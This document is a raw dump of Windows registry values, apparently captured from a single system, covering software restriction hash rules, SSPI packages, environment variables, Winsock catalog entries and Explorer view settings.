HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemData  0x5eab304f957a49896a006c1c31154015 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  ItemSize  779 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{349d35ab-37b5-462f-9b89-edd5fbde1328}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemData  0x67b0d48b343a3fd3bce9dc646704f394 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  ItemSize  517 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemData  0x327802dcfef8c893dc8ab006dd847d1d 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  ItemSize  918 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemData  0xbd9a2adb42ebd8560e250e4df8162f67 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  ItemSize  229 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{94e3e076-8f53-42a5-8411-085bcc18a68d}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  HashAlg  32771 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemData  0x386b085f84ecf669d36b956a22c01e80 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  ItemSize  370 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Hashes\​{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}  SaferFlags 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  ItemData  %HKEY_CURRENT_USER\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Shell Folders\​Cache%OLK* 
HKLM\​Software\​Policies\​Microsoft\​Windows\​Safer\​CodeIdentifiers\​0\​Paths\​{dda3f824-d8cb-441b-834d-be2efd2c1a33}  SaferFlags 
HKLM\​System\​CurrentControlSet\​Control\​ComputerName\​ActiveComputerName  ComputerName  USER 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Capabilities  16464 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Comment  Digest SSPI Authentication Package 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Name  Digest 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  RpcId  65535 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  TokenSize  65535 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Type  49 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​digest.dll  Version 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Capabilities  55 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Comment  DPA Security Package 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Name  DPA 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  RpcId  17 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  TokenSize  768 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Type  49 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msapsspc.dll  Version 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Capabilities  55 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Comment  MSN Security Package 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Name  MSN 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  RpcId  18 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  TokenSize  768 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Type  49 
HKLM\​System\​CurrentControlSet\​Control\​Lsa\​SspiCache\​msnsspc.dll  Version 
HKLM\​System\​CurrentControlSet\​Control\​MediaProperties\​PrivateProperties\​Joystick\​Winmm  wheel 
HKLM\​System\​CurrentControlSet\​Control\​ProductOptions  ProductType  WinNT 
HKLM\​System\​CurrentControlSet\​Control\​SecurityProviders  SecurityProviders  msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll 
HKLM\​System\​CurrentControlSet\​Control\​SecurityProviders\​SaslProfiles  GSSAPI  Kerberos 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  ComSpec  %SystemRoot%\​system32\​cmd.exe  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  FP_NO_HOST_CHECK  NO  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  NUMBER_OF_PROCESSORS  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  OS  Windows_NT  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PATHEXT  .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_ARCHITECTURE  x86  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_IDENTIFIER  x86 Family 6 Model 3 Stepping 3, GenuineIntel  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_LEVEL  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  PROCESSOR_REVISION  0303  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  Path  %SystemRoot%\​system32;%SystemRoot%;%SystemRoot%\​System32\​Wbem  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TEMP  %SystemRoot%\​TEMP  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  TMP  %SystemRoot%\​TEMP  10 
HKLM\​System\​CurrentControlSet\​Control\​Session Manager\​Environment  windir  %SystemRoot%  10 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Domain   
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  Hostname  user 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters  UseDomainNameDevolution 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  HelperDllName  %SystemRoot%\​System32\​wshtcpip.dll 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  Mapping  0x0b0000000300000002000000010000000600000002000000010000000000 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MaxSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  MinSockaddrLength  16 
HKLM\​System\​CurrentControlSet\​Services\​Tcpip\​Parameters\​Winsock  UseDelayedAcceptance 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters  WinSock_Registry_Version  2.0 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Num_Catalog_Entries 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  DisplayString  Tcpip 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  ProviderId  0x409d05229e7ecf11ae5a00aa00a7112b 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  SupportedNameSpace  12 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000001  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  DisplayString  NTDS 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  LibraryPath  %SystemRoot%\​System32\​winrnr.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  ProviderId  0xee37263b80e5cf11a55500c04fd8d4ac 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  SupportedNameSpace  32 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000002  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  DisplayString  Network Location Awareness (NLA) Namespace 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Enabled 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  LibraryPath  %SystemRoot%\​System32\​mswsock.dll 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  ProviderId  0x3a244266a83ba64abaa52e0bd71fdd83 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  StoresServiceClassInfo 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  SupportedNameSpace  15 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​NameSpace_Catalog5\​Catalog_Entries\​000000000003  Version 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Next_Catalog_Entry_ID  1012 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Num_Catalog_Entries  11 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9  Serial_Access_Num 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000001  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000002  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000003  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000004  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000005  PackedCatalogItem  %SystemRoot%\​system32\​rsvpsp.d 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000006  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000007  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000008  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000009  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000010  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​CurrentControlSet\​Services\​WinSock2\​Parameters\​Protocol_Catalog9\​Catalog_Entries\​000000000011  PackedCatalogItem  %SystemRoot%\​system32\​mswsock. 
HKLM\​System\​Setup  SystemSetupInProgress 
HKLM\​System\​WPA\​PnP  seed  1374283966 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TEMP  %USERPROFILE%\​Local Settings\​Temp  10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Environment  TMP  %USERPROFILE%\​Local Settings\​Temp  10 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  CertificateRevocation 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  DisableCachingOfSSLPages 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableHttp1_1 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  EnableNegotiate 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  MimeExclusionListForCache  multipart/mixed multipart/x-mixed-replace multipart/x-byteranges  
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  SecureProtocols  160 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnPost  0x01000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​SOFTWARE\​Microsoft\​Windows\​CurrentVersion\​Internet Settings  WarnOnZoneCrossing 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows NT\​CurrentVersion\​Winlogon  ParseAutoexec 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​  ShellState  0x2400000033880000000000000000000000000000010000000d0000000000 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  DontPrettyPath 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  Filter 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  Hidden 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  HideFileExt 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  HideIcons 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  MapNetDrvBtn 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  NoNetCrawling 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  SeparateProcess 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowCompColor 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowInfoTip 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  ShowSuperHidden 
HKU\​S-1-5-21-1229272821-1004336348-527237240-1003\​Software\​Microsoft\​Windows\​CurrentVersion\​Explorer\​Advanced  WebView